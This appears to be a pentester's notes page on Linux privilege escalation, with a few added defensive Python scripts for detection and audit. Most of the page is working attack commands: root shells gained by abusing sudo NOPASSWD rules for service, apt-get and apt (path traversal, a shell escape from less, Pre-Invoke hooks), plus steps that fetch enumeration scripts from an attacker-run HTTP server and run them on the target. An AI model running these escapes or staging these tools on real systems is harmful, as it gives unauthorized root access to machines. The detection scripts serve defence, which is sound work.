service – Privilege Escalation

Sudo (NOPASSWD) service – Privilege Escalation

If you are ever allowed to run the “service” command with root privileges, you can escape from a restricted shell to a root shell.

In this example, /etc/sudoers allows a user to run this program as root without a password.

How to

1. sudo -l

2. Now that we know the command can be run without a password, run:

  • sudo service ../../../bin/bash
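A detection for the command above, as an added example that is not part of the original post: it scans sudo log entries for service invocations whose service name resolves outside /etc/init.d. The log lines are constructed; the default sudo syslog format and the /etc/init.d lookup done by the SysV-style service wrapper are assumptions.

```python
import posixpath
import re

# Constructed sample of sudo entries as they would appear in /var/log/auth.log.
SAMPLE_LOG = """\
Mar  3 10:01:12 web01 sudo:  svcuser : TTY=pts/0 ; PWD=/home/svcuser ; USER=root ; COMMAND=/usr/sbin/service nginx restart
Mar  3 10:02:40 web01 sudo:  svcuser : TTY=pts/0 ; PWD=/home/svcuser ; USER=root ; COMMAND=/usr/sbin/service ../../../bin/bash
Mar  3 10:03:05 web01 sudo:  svcuser : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
INIT_DIR = "/etc/init.d"  # assumption: where the service wrapper looks up names


def resolve_service_target(name):
    """Return the path `service NAME` would run, with ../ segments collapsed."""
    return posixpath.normpath(posixpath.join(INIT_DIR, name))


def find_service_escapes(log_text):
    """Return (user, runas, resolved_path) for service names that leave INIT_DIR."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        if posixpath.basename(argv[0]) != "service" or len(argv) < 2:
            continue
        target = resolve_service_target(argv[1])
        # A legitimate service name stays directly inside /etc/init.d.
        if posixpath.dirname(target) != INIT_DIR:
            hits.append((m.group("user"), m.group("runas"), target))
    return hits


if __name__ == "__main__":
    for user, runas, target in find_service_escapes(SAMPLE_LOG):
        print(f"ALERT: {user} ran service as {runas}, resolving to {target}")
```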

 

apt-get – Privilege escalation

apt-get can be used to escalate privileges when sudo is allowed without a password.

How to

1. Check the permissions this user has

  • sudo -l

We can see that /usr/bin/apt-get is allowed (NOPASSWD)

2. Open the changelog documentation

  • sudo apt-get changelog apt

3. At the prompt at the bottom, type the following to switch to /bin/bash. The document has been opened as root in what seems to be the “less” Linux utility.

  • !/bin/bash
  • <enter>

After that, you are immediately logged in as root.

Using apt-get & apt update for privilege escalation

(For this to work the target package (e.g., sl) must not be installed.)

  • TF=$(mktemp)
  • echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
  • sudo apt-get install -c $TF sl

How to

1. Having NOPASSWD rights

  • sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
  • whoami

If you type exit, the apt-get update command then starts to do its job.

2. Using apt

  • sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

To use either apt or apt-get this way, you need sudo access. Check it with:

sudo -l
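To review what sudo -l reports, the following added example (not from the original post) parses a listing and flags rules that grant the commands used on this page: service, apt-get and apt. The listing is constructed, the user and host names are placeholders, and the layout of the sudo -l output is an assumption.

```python
import posixpath
import re

# Commands this page shows spawning a root shell when allowed through sudo.
SHELL_CAPABLE = {"service", "apt-get", "apt"}

# Constructed `sudo -l` output; "deploy" and "web01" are placeholders.
SAMPLE_SUDO_L = """\
Matching Defaults entries for deploy on web01:
    env_reset, mail_badpass

User deploy may run the following commands on web01:
    (root) NOPASSWD: /usr/sbin/service
    (ALL : ALL) /usr/bin/systemctl status nginx
    (root) NOPASSWD: /usr/bin/apt-get, /usr/bin/apt update
    (root) NOPASSWD: /usr/bin/tail -n 50 /var/log/syslog
"""

RULE_RE = re.compile(
    r"^\s+\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_listing(text):
    """Return one finding per rule that grants a command from SHELL_CAPABLE."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(", "))):
            argv = cmd.split()
            if posixpath.basename(argv[0]) in SHELL_CAPABLE or cmd == "ALL":
                findings.append({
                    "runas": m.group("runas"),
                    "command": cmd,
                    "nopasswd": nopasswd,
                    # A rule without arguments lets the user pass any arguments.
                    "open_args": len(argv) == 1 or "*" in cmd,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE_SUDO_L):
        level = "HIGH" if f["nopasswd"] and f["open_args"] else "REVIEW"
        print(f"{level}: ({f['runas']}) {f['command']}")
```

A rule listed without arguments accepts any arguments, which is what the service and apt-get commands above rely on; a rule with fixed arguments only matches that exact command line.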

linux-exploit-suggester – Enumeration of Linux kernel/Linux-based machine

LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine.

https://github.com/mzet-/linux-exploit-suggester

Execute

1. Download the tool

  • git clone https://github.com/mzet-/linux-exploit-suggester.git

  • cd linux-exploit-suggester
  • ls

2. Start a Python web server

  • python -m SimpleHTTPServer 9999

3. Download the script onto the server

  • wget http://10.10.14.16:9999/linux-exploit-suggester
  • chmod a+x linux-exploit-suggester
  • ./linux-exploit-suggester

For each exploit, exposure is calculated. Following ‘Exposure’ states are possible:

  • Highly probable – assessed kernel is most probably affected and there’s a very good chance that PoC exploit will work out of the box without any major modifications.
  • Probable – it’s possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
  • Less probable – additional manual analysis is needed to verify if kernel is affected.
  • Unprobable – highly unlikely that kernel is affected (exploit is not displayed in the tool’s output)

Example to further analyze the exploits

This exploit is rated less probable, so we need to confirm the info above.

libc6:2.23-ubuntu

Ubuntu=16.04.3

The info from the script matches the config files and the output of the server, so it qualifies to be exploited.

LinEnum – Linux config enumeration

The art of privilege escalation is a skill that any competent hacker should possess. It’s an entire field unto itself, and while it’s good to know how to perform the techniques involved manually, it’s often more efficient to have a script automate the process. LinEnum is one such script that can be incredibly useful for privilege escalation on Linux systems.

LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.

https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Exploitation

1. Download LinEnum into Kali/Parrot machine

2. Access the directory LinEnum and start a python http server

  • cd LinEnum
  • ls
  • python -m SimpleHTTPServer 9999

3. Download the file LinEnum.sh into the target machine

  • cd /tmp

Other good candidates are: /tmp, /dev/shm, /var/lock, /run/lock

  • wget http://10.10.14.10:9999/LinEnum.sh
  • ls -l

4. Set the script permissions to be executable

  • chmod a+x LinEnum.sh
  • ls -l

5. Execute the script.

  • bash LinEnum.sh

Information starts to get collected. Analyze the output and see what is interesting.
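The directories listed in step 3 can be checked from the defender's side. This added example (not part of the original post) reads /proc/mounts content and reports which of them sit on a mount lacking noexec, nosuid or nodev; the mount table is constructed and the resolve parameter is a hypothetical hook for symlink resolution.

```python
import posixpath

# Directories the page lists as download locations on the target.
STAGING_DIRS = ["/tmp", "/dev/shm", "/var/lock", "/run/lock"]
WANTED = ("noexec", "nosuid", "nodev")

# Constructed /proc/mounts content: device, mount point, type, options, dump, pass.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /run tmpfs rw,nosuid,nodev,noexec,relatime,size=401260k 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
tmpfs /run/lock tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k 0 0
"""


def parse_mounts(text):
    """Map mount point -> set of options; later lines override earlier ones."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            mounts[fields[1]] = set(fields[3].split(","))
    return mounts


def covering_mount(path, mounts):
    """Return the longest mount point that is `path` or one of its parents."""
    while path not in mounts and path != "/":
        path = posixpath.dirname(path)
    return path


def missing_hardening(mounts_text, dirs=STAGING_DIRS, resolve=lambda p: p):
    """Return {directory: [wanted options absent on the mount backing it]}.

    On a live host pass resolve=os.path.realpath, since /var/lock is often
    a symlink to /run/lock.
    """
    mounts = parse_mounts(mounts_text)
    report = {}
    for d in dirs:
        opts = mounts.get(covering_mount(resolve(d), mounts), set())
        gaps = [o for o in WANTED if o not in opts]
        if gaps:
            report[d] = gaps
    return report
```

noexec only blocks direct execution such as ./LinEnum.sh; bash LinEnum.sh and python linuxprivchecker.py still run because the interpreter only reads the file.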

Linux config enumeration – linuxprivchecker

This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits.

https://github.com/sleventyeleven/linuxprivchecker

Execution

1. Download the script into Parrot/Kali machines

  • git clone https://github.com/sleventyeleven/linuxprivchecker.git

  • cd linuxprivchecker
  • ls
  • python -m SimpleHTTPServer 9999

2. Download the file into the target machine

  • wget http://10.10.14.10:9999/linuxprivchecker.py
  • chmod a+x linuxprivchecker.py

3. Execute the file locally in the target machine

  • python linuxprivchecker.py

Check the output and see what information is relevant for privilege escalation.